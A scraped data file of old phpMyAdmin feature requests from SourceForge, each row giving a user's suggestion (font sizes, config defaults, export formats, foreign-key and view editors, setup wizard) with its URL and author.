Original URL https sourceforge.net p phpmyadmin feature requests 885 https sourceforge.net p phpmyadmin feature requests 885 Original author olafvdspek","enhancement"
"24444","5587","Sorted field type dropdown list.
Hi, Could you sort the field type dropdown list?
Original URL https sourceforge.net p phpmyadmin feature requests 886 https sourceforge.net p phpmyadmin feature requests 886 Original author olafvdspek","enhancement"
"24444","5588","PhpMyAdmin for other databases.
Maybe there is a contradiction in the subject, but I am currently using both Oracle and MySql.
It would be great if phpMyAdmin supported other databases, not only MySQL.
Would the introduction of PEAR DB abstraction modules be difficult?
Original URL https sourceforge.net p phpmyadmin feature requests 887 https sourceforge.net p phpmyadmin feature requests 887 Original author zakmck","enhancement"
"24444","5589","Make the deafult theme s font size the same as 2.7.
Please, make the default theme s font size the same as it was in 2.7 In request 1436836 you require the user to change the default font size in the browser.
However you have to consider which browser is the most used around the globe 65.2 Internet Explorer, 25.1 Firefox), and of those, which percentage has the default font face to Times New Roman and a Medium or 16 pt font size 95 ), so 85 of your possible users are likely to see a great diference in font sizes when upgrading from 2.7 to 2.8 So if you want to require your users to change the font size locally, you ll be forcing them to switch the font size of every site on the internet that does no use absolute font sizes like pt or px).
Now if you don t want to hardcode the font size, then I suggest to be at least configurable in the config.inc.php file, which could be easier for the sysadmin to configure since now a setup wizard is available Original URL https sourceforge.net p phpmyadmin feature requests 888 https sourceforge.net p phpmyadmin feature requests 888 Original author technomike","enhancement"
"24444","5590","Make the whole admin panel AJAX based.
Make the whole admin panel AJAX based would help reduce bandwidth usage, and increase response times.
AJAX would help when viewing the structure of a table, browsing the contents of a table, performing SQL queries, etc.
Original URL https sourceforge.net p phpmyadmin feature requests 889 https sourceforge.net p phpmyadmin feature requests 889 Original author jarcand","enhancement"
"24444","5591","Export to ODF.
Hi!
Is there any plan to add the possibility of saving as Open Document Format at least ODS) not only MS Excel?
Original URL https sourceforge.net p phpmyadmin feature requests 892 https sourceforge.net p phpmyadmin feature requests 892 Original author mokrous","enhancement"
"24444","5592","Provide way to show config errors.
Just installed phpMyAdmin 2.8.0.1 on Apache 2.0.54 with PHP 5.0.4 phpMyAdmin does not read config.inc.php.
I double checked the filemode and location.
All is setup correctly as per documentation.
I had to manually edit libraries config.default.php to actually get it to start at all.
Now phpMyAdmin tells me phpMyAdmin was unable to read your configuration file!
on the bottom of the first page.
Calling the config file directly as suggested on that page results in a blank page, indicating there is no problem...
Original URL https sourceforge.net p phpmyadmin feature requests 893 https sourceforge.net p phpmyadmin feature requests 893 Original author ncnrick","enhancement"
"24444","5593","Move Add AUTO INCREMENT value from Structure to Data.
Hi, Could you move the Add AUTO INCREMENT value checkbox from Structure to Data?
It s data as it changes when you insert rows and I don t like it when you do a structure only export.
Original URL https sourceforge.net p phpmyadmin feature requests 894 https sourceforge.net p phpmyadmin feature requests 894 Original author olafvdspek","enhancement"
"24444","5594","server status Make suggestions for performance.
server status.php marks problematic states in red.
It would be cool to have practical improvement tipps with suitable values.
eg Opened tables 3 k gt; set table cache = 200 in my.ini thanks Hannes Original URL https sourceforge.net p phpmyadmin feature requests 895 https sourceforge.net p phpmyadmin feature requests 895 Original author rasty72","enhancement"
"24444","5595","include OLD PASSWORD in the FUNCTION dropdown list.
It would be a handy feature to have OLD PASSWORD function in the drop down list amongst such features like PASSWORD, SHA1 etc.
Original URL https sourceforge.net p phpmyadmin feature requests 896 https sourceforge.net p phpmyadmin feature requests 896 Original author josuah08","enhancement"
"24444","5596","Add Aliases for Databases in Database Pulldown.
Hosting phpMyAdmin on a restricted Domain no Shell) that only let s you create db124554554 , db424554554 , db5424554554 is sometimes really painful, especially when you have to administer more than one DB.
And then you often have only FTP to update the MySQL installation.
So, please add a configuration option like cfg[ Servers ][ i][ dbonly alias ] = HolyShop.de ; or cfg[ Servers ][ i][ dbonly name ] = HolyShop.de ; or something ..and display the aliases on the table pulldown in the left panel and perhaps in the right one when you click localhost .
Original URL https sourceforge.net p phpmyadmin feature requests 897 https sourceforge.net p phpmyadmin feature requests 897 Original author blu rayne","enhancement"
"24444","5597","save language for each server.
I have 4 servers in PMA.
On one of them I need german UTF 8, on the others german ISO 8859 1.
Now I have to go always to the main page and change the language.
That sucks a little bit.
It would be great if you could define the language in the config for each server or set for each server a cookie or somethink like that.
Original URL https sourceforge.net p phpmyadmin feature requests 898 https sourceforge.net p phpmyadmin feature requests 898 Original author elflein","enhancement"
"24444","5598","Report error if no i in config.inc.php.
So some users who aren t familiar with the concept of an array and needing to have i=0; i ; in config.inc.php are having problems logging in because PMA silently ignores their username, password, etc.
in config.inc.php since it s not set for a server[1]).
It should be possible to detect if they missed it, perhaps by seeing if servers[0] is set?)
and displaying an error message.
Yeah, I know it should be figured out from reading the docs and looking at the default config file, but I guess the only copy values you want to override the defaults part gets them or something.
Is there something that can be done about this?
Original URL https sourceforge.net p phpmyadmin feature requests 899 https sourceforge.net p phpmyadmin feature requests 899 Original author ibennetch","enhancement"
"24444","5599","Add one option to disable SQL CALC FOUND ROWS.
phpMyAdmin team, When i have one big select, when this select use more then one table, mysql create a temporary table to result.
To count, phpMyAdmin use SQL CALC FOUND ROWS.
With that 50 of query time are to count this result.
My idea is create one config to disable SQL CALC FOUND ROWS.
Thanks Original URL https sourceforge.net p phpmyadmin feature requests 900 https sourceforge.net p phpmyadmin feature requests 900 Original author sbhornia","enhancement"
"24444","5600","Lite Version.
This takes forever to install on either dial up or a slow remote desktop connection.
I would like to see a lite version, perhaps with a few languages and very basic non graphical theme for us nerds that don t care and just want the job done quick. )
Thanks, Nessa Original URL https sourceforge.net p phpmyadmin feature requests 901 https sourceforge.net p phpmyadmin feature requests 901 Original author nessagoodwin","enhancement"
"24444","5601","Trigger.
It would be nice if all the triggers exists for a table would be shown on tbl properties structure.php.
Thanks Andreas P.S.
I know nothing about php.
So the query is not quotet.
This is only for demonstrate my idea.
Original URL https sourceforge.net p phpmyadmin feature requests 902 https sourceforge.net p phpmyadmin feature requests 902 Original author wumpus tf","enhancement"
"24444","5602","Allow search redefining directly from browse view.
When I am browsing some results from a table, it would be really helpful if the values in each cell were a link.
By clicking on this link it would perform a search or augment the current search) for that value in that column.
This can be a very useful way to narrow down the search results without needing to edit SQL or go back to the search tab.
For example, lets say that I am looking at some rows which have a username column.
If I want to narrow the results to show one particular username, I should be able to do this quickly by clicking on the username and having search conducted with the extra parameter.
Original URL https sourceforge.net p phpmyadmin feature requests 903 https sourceforge.net p phpmyadmin feature requests 903 Original author offsky","enhancement"
"24444","5603","Field Editor Size Empty > Max Size.
When you forget to enter a field size for a varchar column, phpMyAdmin complains.
Could it silently use the max size 255) instead?
Original URL https sourceforge.net p phpmyadmin feature requests 907 https sourceforge.net p phpmyadmin feature requests 907 Original author olafvdspek","enhancement"
"24444","5604","Text Size in phpMyAdmin.
The base font size has become really large size since the last release at least phpMyAdmin 2.8.0.2).
I ve pointed it out to Lem.
His response is below.
I think it would be a reasonable feature request to add something in the config.inc.php.
Within the concept of open source, we could at least allow the base font and size to be configurable?
If taille normal means normal size, at least let the config file decide which font.
Arial normal size is quite big compared to Times New Roman normal size.
Maybe ctrl or ctrl is intuitive for some, but not All users.
Some are not hardcore databasers; some are secretaries and researchers working for us, doing the grunt work.
If they have to reduce the font size for one site and enlarge it for another, this makes for a itchy office climate where change for change s sake does not bode well.
gt;Pour la taille des polices, maintenant phpMyAdmin gt;utilise la taille normale de ton navigateur.
gt;Tout navigateur moderne peut modifier rapidement la gt;taille de la police avec firefox c est control ou ) http testesp.flsh.usherbrooke.ca images textsizeInternetExplorer.jpg http testesp.flsh.usherbrooke.ca images textsizeMozilla.jpg I m not expecting everyone to agree, just let s keep an open mind about it, an Open Source mind about it.
Original URL https sourceforge.net p phpmyadmin feature requests 904 https sourceforge.net p phpmyadmin feature requests 904 Original author jtjohnston","enhancement"
"24444","5605","config.inc.php missing.
I ve already discussed this with Lem.
I noted in my last download of phpMyAdmin 2.8.0.2 that the config.inc.php was missing.
I had to muck around Documentation.html ten minutes to figure out that I could re use my old config.inc.php from my last install, which was phpMyAdmin 2.6.4 pl3 in fact).
It took me another 5 minutes to figure out that I could reuse phpMyAdmin 2.8.0.2 libraries config.default.php by saving a new copy in phpMyAdmin 2.8.0.2 .
Ok, I m whining.
But what happens for the new user who goes looking for the config file?
It isn t there.
When I upgrade, myself, I prefer to use a brand new copy of config.inc.php, just in case ya ll decided to add something new.
And ya ll did!
I was actually waiting for this release to configure something new, so I indeed needed a new config.inc.php.
It would have been shameful and useless to reuse the previous file from phpMyAdmin 2.6.4 pl3 shameful that I waited to upgrade too I suppose).
Why not just put a copy of config.inc.php back in the root directory?
Pretty please ) Original URL https sourceforge.net p phpmyadmin feature requests 905 https sourceforge.net p phpmyadmin feature requests 905 Original author jtjohnston","enhancement"
"24444","5606","Option to disable print dialog on print preview.
In phpMyAdmin 2.7.0 pl2 when I click on the print view buttons at the bottom of a table browse page, I get printview alright, but I d like more control over the presentation.
First, I d like the pop up printer dialog to be optional.
Next I d like to eliminate or contol the LIMIT on the number of records.
In small tables, for example, I d just like to see the whole table displayed.
Ideally there would be some controls on the table browser page but php configuration variables would be ok.
Thanks.
Original URL https sourceforge.net p phpmyadmin feature requests 906 https sourceforge.net p phpmyadmin feature requests 906 Original author isb0459","enhancement"
"24444","5607","import charset default in config.inc.php.
Hello, I suggest to add the following variable cfg[ Import ][ charset ] = utf8 ) in config.inc.php for further use in display import.lib.php where the dropdown box for the charset is generated by PMA generateCharsetDropdownBox.
Now there ist utf8 hardcoded as default selection but I always had to pay attention to set this selection to latin1 each import to get the german special characters correctly imported.
Regards, Tom Original URL https sourceforge.net p phpmyadmin feature requests 912 https sourceforge.net p phpmyadmin feature requests 912 Original author tombayer","enhancement"
"24444","5608","Improvements for the table editor index creation).
If I add two indexed fields to a table, it adds a combined index while it should add two separate indexes.
ALTER TABLE `xwi admin log` ADD `a` VARCHAR 255 ) NOT NULL , ADD `b` VARCHAR 255 ) NOT NULL ; ALTER TABLE `xwi admin log` ADD INDEX `a` , `b` ) ; Original URL https sourceforge.net p phpmyadmin feature requests 908 https sourceforge.net p phpmyadmin feature requests 908 Original author olafvdspek","enhancement"
"24444","5609","priniting feature request.
I have been testing with mysql and phpmyadmin to replace an old network cable label databse.
I have created my table which represents fields that could appear on a lable indicating where a patch cable s endpoint are.
I would like to request an option from the table in Insert page to not only save the information inseted but to also print out the infomtation to a printer.
From the insert page, there currently exists the insert another new row or go back to previous page options after clicking to GO button.
I would like to have a print option that would let me customize output prinitng to try to get the recently added table information to print out to my Epson dot matrix label printer.
I do have some specific printing characters that helps set up the printer to format the text to fit on my labels.
Original URL https sourceforge.net p phpmyadmin feature requests 909 https sourceforge.net p phpmyadmin feature requests 909 Original author searsrf","enhancement"
"24444","5610","File based User specific configuration.
In my environment, I have several different programmer dba that need to access different databases.
With a minor change to common.lib.php I have been able to implement that by giving each user their own configuration file which provides access to the specific databases they need.
It gets the logged in username from the server, removes the domain in the case of Windows, and checks for a user specific configuration file.
Detects the config file we want to load config to load = .
config.inc.php ; username = SERVER[ PHP AUTH USER ]; arr = explode \\ , username); username = end arr); if username != ) \{ if file exists .
config .
username .
.inc.php )) \{ config to load = .
config .
username .
.inc.php ; \} \} SESSION[ PMA Config ] = new PMA Config config to load); SESSION[ PMA Config ] = new PMA Config .
config.inc.php ); I have made this change to a couple of different versions and think it may be helpful to others.
It would also eliminate my need to customize with each update.
Thanks Original URL https sourceforge.net p phpmyadmin feature requests 910 https sourceforge.net p phpmyadmin feature requests 910 Original author paulpgm","enhancement"
"24444","5611","status key reads writes ratio.
Hi, Could you add key reads writes ratio key reads key read requests)?
Original URL https sourceforge.net p phpmyadmin feature requests 911 https sourceforge.net p phpmyadmin feature requests 911 Original author olafvdspek","enhancement"
"24444","5612","Import schema from Mysql Workbench.
Mysql workbench is available at mysql.com and allows to draw a very nice relationship diagram.
It would be great to have an import diagram from workbench to phpmyadmin.
Workbench saves diagrams as XML file.
I am ready to write a converter but i need help in order to integrate into phpmyadmin what is the xml parser you recommend ?
where can i put my script ?
inside pdf pages.php ?)
I see something like a form selects and loads the xml files a parser extract the list of tables and relations some INSERT in pma relation some INSERT in pma pdfpages and pma tablescoords Original URL https sourceforge.net p phpmyadmin feature requests 913 https sourceforge.net p phpmyadmin feature requests 913 Original author fpiccinali","enhancement"
"24444","5613","font size in CSS files.
I recently downloaded the latest version of phpMyAdmin 2.8.0.3) and I noticed a wide difference in the display of the site.
I determined this to be an empty font size setting in the CSS files.
I added the line font size 10pt; under the body attribute in the original template.
This font size attribute should be set in the themes to prevent the browsers from overriding the developer s original design intention.
I have seen proper CSS in the previous versions, but I could not understand why the font size attribute would be removed in this version.
Please include it in any future versions.
Original URL https sourceforge.net p phpmyadmin feature requests 918 https sourceforge.net p phpmyadmin feature requests 918 Original author buckwheat469","enhancement"
"24444","5614","multiple column foreign key relation.
It seems impossible to insert a foreing key relation with multiple columns by the relation interface.
In practical from the interface it is impossible to have the equivalent of the SQL ALTER TABLE `locktable` ADD CONSTRAINT `locktable ibfk 1` FOREIGN KEY `axoid`, `version`) REFERENCES `versionhistory` `axoid`, `version`); since the interface generates ALTER TABLE `locktable` ADD CONSTRAINT `locktable ibfk 1` FOREIGN KEY `axoid`) REFERENCES `versionhistory` `axoid`), ADD CONSTRAINT `locktable ibfk 2` FOREIGN KEY `version`) REFERENCES `versionhistory` `version`); Is it possible to add this for me) useful operation?
Valamath Fabrizio) Original URL https sourceforge.net p phpmyadmin feature requests 919 https sourceforge.net p phpmyadmin feature requests 919 Original author valamarth","enhancement"
"24444","5615","View query builder.. View query builder.
Check the boxes next to the fields you want to include from the Structure page, click Create View .
Next page would ask if you want to add another table, then click Next.
Next page should ask which fields if any) you want to use to join the two tables, then click Next.
Next page asks if you want to add another table.
Keep going through until you get everything you want in your view.
Original URL https sourceforge.net p phpmyadmin feature requests 914 https sourceforge.net p phpmyadmin feature requests 914 Original author egingell","enhancement"
"24444","5616","Resizeable query textarea.
This should be possible to resize, or at least it should be possible to make it larger.
As it is now it s impossible to work with large queries in this window.
Original URL https sourceforge.net p phpmyadmin feature requests 915 https sourceforge.net p phpmyadmin feature requests 915 Original author stadskle","enhancement"
"24444","5617","Search using IN operator.
It would be nice if on the search screen I could search on a number using the IN operator.
eg.
WHERE id IN 1,2,3) At the moment you cant search on multiple distinct values in the one field if its not a SET data type but just an ordinary INTEGER.
Original URL https sourceforge.net p phpmyadmin feature requests 916 https sourceforge.net p phpmyadmin feature requests 916 Original author mrsmiley18","enhancement"
"24444","5618","Names of all ASCII files to have extension.
In the distribution and in references to the affected files in the code) it would be useful if all ASCII files had names ending in extensions that would indicate to FTP clients that they are ASCII files.
Example files ChangeLog, CREDITS; these could be ChangeLog.txt, CREDITS.txt, etc.
Original URL https sourceforge.net p phpmyadmin feature requests 917 https sourceforge.net p phpmyadmin feature requests 917 Original author brec","enhancement"
"24444","5619","preconfigured config folder.
a preconfigured config folder with adequate rights in the distributed file would be helpfull.
no need for 3 extra steps after untaring or unzipping cd phpMyAdmin mkdir config create directory for saving chmod o rw config and less complaints in the forums ;) Original URL https sourceforge.net p phpmyadmin feature requests 920 https sourceforge.net p phpmyadmin feature requests 920 Original author windkiel","enhancement"
"24444","5620","End of line in setup generated files.
when i use phpmyadmin 2.8.1 on windows xp, and i run the setup script, it creates the config file as it should when i open the created configuration file, it is all on one line and almost impossible to edit Suggestion store get defined constants ) to a variable then if that [ PHP OS ] is WINNT store \r\n to a string if its MAC then store \r to the string otherwise store \n to that string at all places where \n is printed, print the string instead Original URL https sourceforge.net p phpmyadmin feature requests 921 https sourceforge.net p phpmyadmin feature requests 921 Original author ti314159","enhancement"
"24444","5621","SET and ENUM editing is painful.
Editing large SET or ENUM field type is very hard in small field which is reserver for it.
There should be some more user friendly way to work with such fields.
Javascript based popup which would allow creating editing deleting fields and would create text field content according to them could help a lot here.
Original URL https sourceforge.net p phpmyadmin feature requests 922 https sourceforge.net p phpmyadmin feature requests 922 Original author nijel","enhancement"
"24444","5622","Table filtering.
Would be fine to have table filtering feature!
I have single database access, so I use prefixed tables.
Therefore I have a lot tables.
This means, a set of prefixed tables is assumed as a single database by me.
So if I want to work only with tables prefixed with db1 , then it is a pain for me without filtering feature.
Suggestion Let we have a filter form, where I can type to list all tables matching db1 .
Thanks, Webmaster33 Original URL https sourceforge.net p phpmyadmin feature requests 923 https sourceforge.net p phpmyadmin feature requests 923 Original author webmaster33","enhancement"
"24444","5623","Replace FPDF library with TCPDF.
I notice that phpMyAdmin is using both FPDF and UFPDF libraries.
I suggest to replace both libraries with TCPDF [http sourceforge.net projects tcpdf ] that integrates all functionalities of the previous and more), it s more stable and better documented.
The only issue is that TCPDF require PHP5 but a PHP4 compatible version requires just few search and replace .
Original URL https sourceforge.net p phpmyadmin feature requests 924 https sourceforge.net p phpmyadmin feature requests 924 Original author nicolaasuni","enhancement"
"24444","5624","Export SQL file extension as .mysql, not .sql.
Hello, At the moment phpMyAdmin extensively supports mysql.
When a user exports their database through phpmyadmin, the exported file locahost.sql) ends in a .sql extension.
Furthermore, the mysql engine proceses imported and exported files and files are generated to comply with addtional mysql sql grammer rules beyond the original sql grammer specs).
Recommendation The localhost.sql file be renamed to localhost.mysql, or localhost.mysql.sql to imply that it confirms to sql, but needs to maintain mysql syntax rules which at the same time do conflict with sql conventions... see example below) Reasoning If you are editing the sql file in a text editor, you must comply with mysql grammer specs if you want the file to be compatable with other phpmyadmin mysql installations.
To anyone reviewing the file localhost.sql in their favourite text editor vim, emacs, whatever), it would more benefiticial to have mysql syntax highlighting apply to the file rather than sql syntax highlighting.
Mysql language syntax deviates in at least one area from SQL syntax I found this edited for conciseness) on mysql s website note the part about must be followed by a space ... if you don t do that, the file won t import successfuly back into mysql) Standard SQL uses as a start comment sequence.
MySQL Server 3.23.3 and up also supports a variant of the comment style.
That is, the start comment sequence must be followed by a space or by a control character such as a newline).
The space is required to prevent problems with automatically generated SQL queries that use constructs http dev.mysql.com doc refman 5.0 en ansi diff comments.html Thoughts?
This isn t a bug, per se, but it prevents bugs and can encourage more appropriate syntax highlighting.
I was importing back into phpmyadmin a file I exported earlier, and made the mistake above with comments.
There, I learned that in this case, mysql requires an update of sql specs.
Krystian Original URL https sourceforge.net p phpmyadmin feature requests 925 https sourceforge.net p phpmyadmin feature requests 925 Original author alberciak","enhancement"
"24444","5625","Create pmadb in setup.
Currently user has to create pmadb and control user) manually.
However setup script could do this automatically when being asked to do so.
Original URL https sourceforge.net p phpmyadmin feature requests 931 https sourceforge.net p phpmyadmin feature requests 931 Original author nijel","enhancement"
"24444","5626","Spatial.
if possible add spatial type Original URL https sourceforge.net p phpmyadmin feature requests 926 https sourceforge.net p phpmyadmin feature requests 926 Original author gufo rosso","enhancement"
"24444","5627","Export to target version.
I do a lot of work exporting and importing data between various versions of MySQL.
Currently when you export the data from say a MySQL 4.1 or 5.0, and try and import that into MySQL 4.0, there are errors in the dump syntax because phpMyAdmin assumes the import server is running the same version of MySQL as the export server.
The primary issues I consistenly come across is the export setting flags like TIMESTAMP columns defaulting to CURRENT TIMESTAMP, which doesn t exist under MySQL 4.0, nor does setting the default charater set to latin1.
I have to manually clean the dump file every time before I can import it.
Can we have another option on the export interface for listing compatibility versions?
eg.
Export as compatible with version lt;= 4.0.x, gt;= 4.1, etc This would save a lot time researching on my part to figure out where all the differences are in the dump formats.
Original URL https sourceforge.net p phpmyadmin feature requests 927 https sourceforge.net p phpmyadmin feature requests 927 Original author mrsmiley18","enhancement"
"24444","5628","Select by prefix or wildcards.
It would be great if we can select tables with their prefix or the best would be if we can select tables with wildcards.
Original URL https sourceforge.net p phpmyadmin feature requests 928 https sourceforge.net p phpmyadmin feature requests 928 Original author mrprise","enhancement"
"24444","5629","ON DELETE and ON UPDATE editor.
It will be very helpful if you add visual editor of extended foreign keys statements like ON DELETE CASCADE, ON UPDATE SET NULL etc for Inno DB tables.
Now it is enough hard work to change foreign keys with these statements because these definitions aren t displayed in the references and can be viewed only with SHOW CREATE TABLE query.
Also one way to change them is removing of foreign key via ALTER TABLE DROP FOREIGN KEY query) and creating of new foreign key manually via ALTER TABLE ADD FOREIGN KEY query).
Because MySQL stands on the way to become reliable DB server with support of data integrity checking, I think you need to add such functions in nearest releases.
Original URL https sourceforge.net p phpmyadmin feature requests 929 https sourceforge.net p phpmyadmin feature requests 929 Original author akudelya","enhancement"
"24444","5630","Check connection params in setup.
When user enters some MySQL connection parameters in setup script, those should be immediatelly checked for correctness, eg.
if it is possible to connect to MySQL server.
Original URL https sourceforge.net p phpmyadmin feature requests 930 https sourceforge.net p phpmyadmin feature requests 930 Original author nijel","enhancement"
"24444","5631","Wizard setup.
Current bunch of buttons is not too much intuitive, it would be better to create wizard which would lead user through whole configuration step by step with optional return to complex interface.
Original URL https sourceforge.net p phpmyadmin feature requests 932 https sourceforge.net p phpmyadmin feature requests 932 Original author nijel","enhancement"
"24444","5632","Allow phpMyAdmin to run in a frame.
phpMyAdmin allways runs in top window, which is ensured in various places in the code.
Could the code be modified, so the software could run in a user defined frame?
Original URL https sourceforge.net p phpmyadmin feature requests 939 https sourceforge.net p phpmyadmin feature requests 939 Original author mccohy","enhancement"
"24444","5633","manage multiple variable in bookmarked query.
now i could only have a variable in a query, as example SELECT Name, Address FROM addresses WHERE 1 AND Name LIKE [VARIABLE] but i cannot do this SELECT Name, Address FROM addresses WHERE 1 AND Name LIKE [VARIABLE] AND age = [VARIABLE2] it is most useful to have rhe possibility to easy manage multiple variable query Original URL https sourceforge.net p phpmyadmin feature requests 933 https sourceforge.net p phpmyadmin feature requests 933 Original author ciskman","enhancement"
"24444","5634","open certain queries to external public).
the print view of an sqlquery is a very nice feature if you want to export some data of a database into a good readeable html table without any disturbing links around it.
it would be nice to be able to make this page open to public for certain sqlqueries.
a simple solution would be to have a code in the querystring, that allows you to see that page without logging in with the right database username and password.
the code can be an MD5 coded string of the sqlquery plus the database username and password.
this way noone can misuse that function from outside.
if this md5string is in the querystring, then the pma authentification script doesent check if the user is allowed to access the database, but instead it checks if the sqlquery in the querystring together with the right password for the selected database give the same md5 string Original URL https sourceforge.net p phpmyadmin feature requests 934 https sourceforge.net p phpmyadmin feature requests 934 Original author rubo77","enhancement"
"24444","5635","BLOB update to NULL.
When you have got a BLOB LONGBLOB column which can be NULL, the edit row press the little pen) does not contain the NUL checkbox.
So you can not set a prior filled BLOB to NULL without doing it by manual SQL query.
Try the following example CREATE TABLE `Table1` `name` varchar 255) NOT NULL default , `bin` longblob, PRIMARY KEY `name`) ) TYPE=MyISAM COMMENT= example ; INSERT INTO `Table1` `name`, `bin`) VALUES MyName , 0x255044462d312e); Now try to edit this row and set `bin` to NULL.
Original URL https sourceforge.net p phpmyadmin feature requests 935 https sourceforge.net p phpmyadmin feature requests 935 Original author nixnuts","enhancement"
"24444","5636","make use of sidebar for navigation.
make use of some browsers sidebar FF, Opera) for the navigation frame requires a config variable cfg[ sidebar enabled ] = true; a check for cfg[ sidebar enabled ] everywhere where a link is opened in other frame f. e. all links in navigation left.php), all this JavaScript code that refreshes index.php or JavaScript failover code default href url) that opens index.php Original URL https sourceforge.net p phpmyadmin feature requests 936 https sourceforge.net p phpmyadmin feature requests 936 Original author cybot tm","enhancement"
"24444","5637","delimiter support.
phpMyAdmin doesn t yet support the DELIMITER operator It s difficult to execute certain commands, like create trigger...
Original URL https sourceforge.net p phpmyadmin feature requests 944 https sourceforge.net p phpmyadmin feature requests 944 Original author streetpc","enhancement"
"24444","5638","Relations with views like with tables.
It would be great if there will be support for creating relations on views.
1) In view you can click on field and switch to another table view.
2) In view you can select which column to show in relations.
And in foreign table you can select any field from view.
3) Use of functions like CONCAT field one, , field two) in relations to show data from related table.
In example i have table of users, which have column for name and another column for surname.
Now i can t show name and surname in related tables.
Original URL https sourceforge.net p phpmyadmin feature requests 937 https sourceforge.net p phpmyadmin feature requests 937 Original author znec","enhancement"
"24444","5639","calendar in search.
It would be really great if the calendar date time chooser that is available for insert operations would also be available in the search area for date or timestamp fields.
Original URL https sourceforge.net p phpmyadmin feature requests 938 https sourceforge.net p phpmyadmin feature requests 938 Original author jimjamesaz","enhancement"
"24444","5640","relational schema with tables from multiple databases.
I would like to be able to create a relational schema in PDF pages) that contains tables from several databases.
Sometimes tables from distinct databases are related.
This feature would be very useful in such cases.
Also see this thread for more info.
http sourceforge.net forum message.php?msg id=3737543 Original URL https sourceforge.net p phpmyadmin feature requests 940 https sourceforge.net p phpmyadmin feature requests 940 Original author castor1","enhancement"
"24444","5641","Would like to be able to produce a shema diff between two db.
I would like to compare db1 with db2 and just output the SQL to make db1 look like db2?
So db1 is version 1 of database.
db2 is version 2 of same database.
Can you please implement in next version?
Original URL https sourceforge.net p phpmyadmin feature requests 941 https sourceforge.net p phpmyadmin feature requests 941 Original author bngobngo","enhancement"
"24444","5642","Show edit delete also when there is calculated column.
I don t like it when the edit and delete buttons disappear even if I only Round ) one column...
I ve traced the problem down to 2.3 Other statements [...] in display tbl.lib.php) and found out that the result set doesn t has the table attribute anymore in such cases.
I m using the 4.0 branch so it might be different in newer versions, but it might be a better idea anyways to figure out if the images should be displayed from the number of tables in the FROM clause or if there is a JOIN.
That would be also more effective than cycling through all columns I suppose... For now I ll just hack in a quick and dirty fix so an empty table attribute will not cause the images to disappear.
But well it s dirty because it will also display the images with a query from two or more tables, when some function is used on all columns of all but one) tables.
Original URL https sourceforge.net p phpmyadmin feature requests 947 https sourceforge.net p phpmyadmin feature requests 947 Original author sebde","enhancement"
"24444","5643","Table flush for NDB.
when using mysql cluster with ndb engine, after every alter table add, change ... ) You should flush table, because for other mysql servers this table will be locked until You flush table.
Maybe Somethinkg like checkbox or auto flush or mayby just a button to flush table ?
Original URL https sourceforge.net p phpmyadmin feature requests 942 https sourceforge.net p phpmyadmin feature requests 942 Original author shadow3d","enhancement"
"24444","5644","Disable Enable Database Create Textfield Main Page.
Would be nice to have the option in the settings to disable enable the ability to create a new database from the textfield on the main page once you login to phpMyadmin.
Original URL https sourceforge.net p phpmyadmin feature requests 943 https sourceforge.net p phpmyadmin feature requests 943 Original author justink101","enhancement"
"24444","5645","internationalize the doc button.
hello Each time I do install phpMyAdmin, I do search where the linl for the doc button is and I do change it.
the doc button links to http dev.mysql.com doc refman 5.0 en index.html but as I m french, I do modify it to lead to http dev.mysql.com doc refman 5.0 fr index.html It would be nice if phpMyAdmin could either determine it by itself base on language on web browser ?)
or simpler and may be sufficient) it could be determined once while installing it.
Original URL https sourceforge.net p phpmyadmin feature requests 949 https sourceforge.net p phpmyadmin feature requests 949 Original author piwaille","enhancement"
"24444","5646","extractvalue.
Provide full support for extractvalue and updateXML.
Extractvalue works sometimes but not always.
I have checked the commands in terminal mode and they work fine, but not via phpMyAdmin.
Sample code CREATE TABLE cdlib doc VARCHAR 1000)); INSERT INTO cdlib VALUES lt;cd gt; lt;cdid gt;A2 1325 lt; cdid gt; lt;cdlabel gt;Atlantic lt; cdlabel gt; lt;cdtitle gt;Pyramid lt; cdtitle gt; lt;cdyear gt;1960 lt; cdyear gt; lt;track length= 00 02 30 gt; lt;trknum gt;1 lt; trknum gt; lt;trktitle gt;Vendome lt; trktitle gt; lt; track gt; lt;track length= 00 10 46 gt; lt;trknum gt;2 lt; trknum gt; lt;trktitle gt;Pyramid lt; trktitle gt; lt; track gt; lt; cd gt; ); INSERT INTO cdlib VALUES lt;cd gt; lt;cdid gt;D136705 lt; cdid gt; lt;cdlabel gt;Verve lt; cdlabel gt; lt;cdtitle gt;Ella Fitzgerald lt; cdtitle gt; lt;cdyear gt;2000 lt; cdyear gt; lt;track length= 00 02 37 gt; lt;trknum gt;1 lt; trknum gt; lt;trktitle gt;A tisket, a tasket lt; trktitle gt; lt; track gt; lt;track length= 00 02 25 gt; lt;trknum gt;2 lt; trknum gt; lt;trktitle gt;Vote for Mr.
Rhythm lt; trktitle gt; lt; track gt; lt;track length= 00 02 52 gt; lt;trknum gt;3 lt; trknum gt; lt;trktitle gt;Betcha nickel lt; trktitle gt; lt; track gt; lt; cd gt; ); select extractvalue doc, cd[cdid= A2 1325 ] cdtitle ) from test.cdlib; gives 1305 FUNCTION test.extractvalue does not exist Output via terminal mode mysql gt; select extractvalue doc, cd[cdid= A2 1325 ] cdtitle ) from test.cdlib; | extractvalue doc, cd[cdid= A2 1325 ] cdtitle ) | | Pyramid | | | 2 rows in set 0.00 sec) Original URL https sourceforge.net p phpmyadmin feature requests 945 https sourceforge.net p phpmyadmin feature requests 945 Original author rtw30606","enhancement"
"24444","5647","Warn before changing collations?.
It seems to come up every month or two in the forums that a user s changed their database collation without knowing that it s destructive to their data, and usually without backups).
Most recently, for example http sourceforge.net forum forum.php?
thread id=1555203 forum id=72909 Perhaps PMA should warn before doing something potentially destructive like changing collations?
Similar to what s done for database|table drops, etc.
Original URL https sourceforge.net p phpmyadmin feature requests 946 https sourceforge.net p phpmyadmin feature requests 946 Original author ibennetch","enhancement"
"24444","5648","default config.inc.php file.
Hello, with the new setup process there is no more default config file, the config file being created after all the process is done.
Please could you, in next release, provide, like previous versions, a default config.inc.php to quickly manually configure phpMyAdmin ?
thanks Original URL https sourceforge.net p phpmyadmin feature requests 948 https sourceforge.net p phpmyadmin feature requests 948 Original author perchman","enhancement"
"24444","5649","Configurable columns in PDF schema.
Good day, I am using phpMyAdmin 2.9.0 beta 1 and am noticing an issue when creating PDF documents.
This issue I have noticed in several of the latest versions as well.
Is there a way to select what columns you wish to have in the table list layout in the PDF.
With the current column layout, some columns have nothing in them and their width remains wide, whereas some other columns could stand to go wider, ie the Field column.
My main concern is some fields have rather long names and overlap onto the Type column in the PDF output.
I have attached a sample PDF document that exhibits the problem listed.
